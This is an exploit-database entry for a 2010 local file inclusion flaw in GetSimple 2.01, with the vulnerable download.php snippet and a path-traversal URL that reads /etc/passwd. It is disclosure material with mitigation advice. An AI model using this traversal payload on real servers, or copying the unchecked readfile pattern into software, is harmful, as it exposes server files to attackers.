header-logo
Suggest Exploit
vendor:
GetSimple
by:
Batch
7,5
CVSS
HIGH
Local File Inclusion (LFI)
22
CWE
Product Name: GetSimple
Affected Version From: 2.01
Affected Version To: 2.01
Patch Exists: YES
Related CWE: N/A
CPE: a:get-simple:get-simple:2.01
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

GetSimple 2.01 LFI

A Local File Inclusion (LFI) vulnerability exists in GetSimple 2.01, which allows an attacker to read arbitrary files on the server. An attacker must be an admin to exploit this vulnerability. The vulnerable code is present in the download.php file, which allows an attacker to read arbitrary files on the server by passing the file path in the 'file' parameter. For example, an attacker can read the /etc/passwd file by sending a request to http://localhost/GetSimple_2.01/admin/download.php?file=../../../../../etc/passwd.

Mitigation:

Upgrade to the latest version of GetSimple, which is not vulnerable to this attack.
Source

Exploit-DB raw data:

# Exploit Title: GetSimple 2.01 LFI
# Date: 4/5/2010
# Author: Batch
# Software Link: http://www.box.net/get-simple
# Version: 2.01

#Special Conditions: Must be admin.
# Code :

...

# get file
if (file_exists($_GET['file'])) {
readfile($_GET['file'], 'r');
}
exit;

...


http://localhost/GetSimple_2.01/admin/download.php?file=../../../../../etc/passwd

#-Batch

#ryan1918.com
#Everyone else.

Navigation

Suggest Exploit

Services By CQR